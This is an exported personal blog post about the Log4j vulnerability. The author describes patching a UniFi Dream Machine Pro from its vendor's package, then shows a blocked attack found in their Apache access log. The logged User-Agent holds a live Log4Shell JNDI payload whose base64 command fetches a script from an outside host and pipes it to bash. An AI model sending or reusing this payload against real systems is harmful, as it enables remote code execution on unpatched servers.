{"id":1535,"date":"2021-12-10T19:03:58","date_gmt":"2021-12-11T00:03:58","guid":{"rendered":"https:\/\/blog.lufamily.ca\/kang\/?p=1535"},"modified":"2022-05-04T19:22:21","modified_gmt":"2022-05-04T23:22:21","slug":"log4j-zero-day","status":"publish","type":"post","link":"https:\/\/blog.lufamily.ca\/kang\/2021\/12\/10\/log4j-zero-day\/","title":{"rendered":"Log4J Zero Day"},"content":{"rendered":"\n<p>I was couch surfing YouTube and came across this video:<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<span class=\"embed-youtube\" style=\"text-align:center; display: block;\"><iframe loading=\"lazy\" class=\"youtube-player\" width=\"840\" height=\"473\" src=\"https:\/\/www.youtube.com\/embed\/CvkUPvIMM7o?version=3&#038;rel=1&#038;showsearch=0&#038;showinfo=1&#038;iv_load_policy=1&#038;fs=1&#038;hl=en-CA&#038;autohide=2&#038;wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\"><\/iframe><\/span>\n<\/div><figcaption>Lawrence Technology Services detailing on the impact of Java Log4j<\/figcaption><\/figure>\n\n\n\n<p>Since Unifi is my front line defence, I learned from the video that a patch from Unifi is already available for my Unifi Dream Machine (UDM) Pro. Of course, this prompted me to jump from my couch to my computer and immediately proceed to upgrade my Network application.<\/p>\n\n\n\n<p>Thanks to Unifi, for addressing this so quickly. However, it was a release candidate so I could not upgrade it via the user interface. Instead I followed Unifi&#8217;s <a rel=\"noreferrer noopener\" href=\"https:\/\/help.ui.com\/hc\/en-us\/articles\/204910064-UniFi-Network-Advanced-Device-and-Application-Update\" target=\"_blank\">recommendation<\/a> and did the following.<\/p>\n\n\n\n<p>First remote shell via <code>ssh<\/code> into the UDM Pro.<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>% <strong>ssh udmpro<\/strong> \nWelcome to UbiOS\n\nBy logging in, accessing, or using the Ubiquiti product, you\nacknowledge that you have read and understood the Ubiquiti\nLicense Agreement and agree to be bound by its terms.\n\n  ___ ___      .__________.__\n |   |   |____ |__\\_  ____\/__|\n |   |   \/    \\|  ||  __) |  |   (c) 2010-2021\n |   |  |   |  \\  ||  \\   |  |   Ubiquiti Inc.\n |______|___|  \/__||__\/   |__|\n            |_\/                  http:\/\/www.ui.com\n\n      Welcome to UniFi Dream Machine!\n\n# <strong>unifi-os shell<\/strong>\nroot@ubnt:\/# cd \/tmp\nroot@ubnt:\/tmp# ls\nhsperfdata_unifi  local.list  unifi-network-status-response  uploads<\/code><\/pre>\n\n\n\n<p>Ensure there is no previous version of <code>unifi_sysvinit_all.deb<\/code> in the <code>\/tmp<\/code> directory. If so, then remove it.<\/p>\n\n\n\n<p>The next step is to download the release candidate version via <code>curl<\/code>, and then install it using <code>dpkg<\/code>.<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>root@ubnt:\/tmp# <strong>curl -o \"unifi_sysvinit_all.deb\" https:\/\/dl.ui.com\/unifi\/6.5.54-3b5d40203c\/unifi_sysvinit_all.deb<\/strong>\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100  126M  100  126M    0     0  27.1M      0  0:00:04  0:00:04 --:--:-- 28.7M\n\nroot@ubnt:\/tmp# <strong>dpkg -i unifi_sysvinit_all.deb<\/strong>\n\n(Reading database ... 65989 files and directories currently installed.)\nPreparing to unpack unifi_sysvinit_all.deb ...\ndebconf: unable to initialize frontend: Dialog\ndebconf: (No usable dialog-like program is installed, so the dialog based frontend cannot be used. at \/usr\/share\/perl5\/Debconf\/FrontEnd\/Dialog.pm line 76.)\ndebconf: falling back to frontend: Readline\nUnpacking unifi (6.5.54-16676-1) over (6.5.53-16673-1) ...\nSetting up unifi (6.5.54-16676-1) ...\nProcessing triggers for systemd (241-5~bpo9+1) ...\n#-> ubnt-dpkg-cache install\nremoving \/data\/dpkg-cache\/stretch\/packages\/unifi_6.5.53-16673-1_all.deb ... done\nunifi: action=install, package=\/data\/dpkg-cache\/stretch\/packages\/unifi_6.5.54-16676-1_all.deb mark=manual\n&lt;-# ubnt-dpkg-cache install\n\nroot@ubnt:\/tmp# <strong>rm unifi_sysvinit_all.deb<\/strong><\/code><\/pre>\n\n\n\n<p>Once the installation is competed, we remove the Debian package.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large border-image\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"735\" src=\"https:\/\/blog.lufamily.ca\/kang\/wp-content\/uploads\/sites\/3\/2021\/12\/Screen-Shot-2021-12-10-at-6.59.05-PM-1024x735.png\" alt=\"\" class=\"wp-image-1537\" srcset=\"https:\/\/blog.lufamily.ca\/kang\/wp-content\/uploads\/sites\/3\/2021\/12\/Screen-Shot-2021-12-10-at-6.59.05-PM-1024x735.png 1024w, https:\/\/blog.lufamily.ca\/kang\/wp-content\/uploads\/sites\/3\/2021\/12\/Screen-Shot-2021-12-10-at-6.59.05-PM-300x215.png 300w, https:\/\/blog.lufamily.ca\/kang\/wp-content\/uploads\/sites\/3\/2021\/12\/Screen-Shot-2021-12-10-at-6.59.05-PM-768x551.png 768w, https:\/\/blog.lufamily.ca\/kang\/wp-content\/uploads\/sites\/3\/2021\/12\/Screen-Shot-2021-12-10-at-6.59.05-PM.png 1134w\" sizes=\"auto, (max-width: 709px) 85vw, (max-width: 909px) 67vw, (max-width: 1362px) 62vw, 840px\" \/><\/figure>\n\n\n\n<p>As you can see above, the Network application is now updated to 6.5.54.<\/p>\n\n\n\n<p>Once again thanks to the folks at Unifi to come out with such a rapid fix.<\/p>\n\n\n\n<p><strong>Update:<\/strong><\/p>\n\n\n\n<p>I was curious whether my server is being attacked with this vector and sure enough there was an attempt logged at around 1pm today.<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>kang@avs \u279c\/var\/log\/apache2 \n% grep jndi *.log\naccess.log:45.155.205.233 - - &#91;10\/Dec\/2021:13:01:48 -0500] \"GET \/ HTTP\/1.1\" 403 489 \"-\" \"<strong>${jndi:ldap:\/\/45.155.205.233:12344\/Basic\/Command\/Base64\/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNzQuMTE5LjE5OS4xNzE6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMTc0LjExOS4xOTkuMTcxOjgwKXxiYXNo}<\/strong>\"<\/code><\/pre>\n\n\n\n<p>The request was made from Russia, and it was blocked, so it is probably a good idea to close any open holes by Log4J. Here is their official <a href=\"https:\/\/logging.apache.org\/log4j\/2.x\/security.html\" target=\"_blank\" rel=\"noreferrer noopener\">page<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I was couch surfing YouTube and came across this video: Since Unifi is my front line defence, I learned from the video that a patch from Unifi is already available for my Unifi Dream Machine (UDM) Pro. Of course, this prompted me to jump from my couch to my computer and immediately proceed to upgrade &hellip; <a href=\"https:\/\/blog.lufamily.ca\/kang\/2021\/12\/10\/log4j-zero-day\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Log4J Zero Day&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[111],"tags":[],"class_list":["post-1535","post","type-post","status-publish","format-standard","hentry","category-tech"],"jetpack_featured_media_url":"","jetpack_shortlink":"https:\/\/wp.me\/p7V6i8-oL","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts\/1535","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/comments?post=1535"}],"version-history":[{"count":8,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts\/1535\/revisions"}],"predecessor-version":[{"id":1546,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/posts\/1535\/revisions\/1546"}],"wp:attachment":[{"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/media?parent=1535"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/categories?post=1535"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lufamily.ca\/kang\/wp-json\/wp\/v2\/tags?post=1535"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}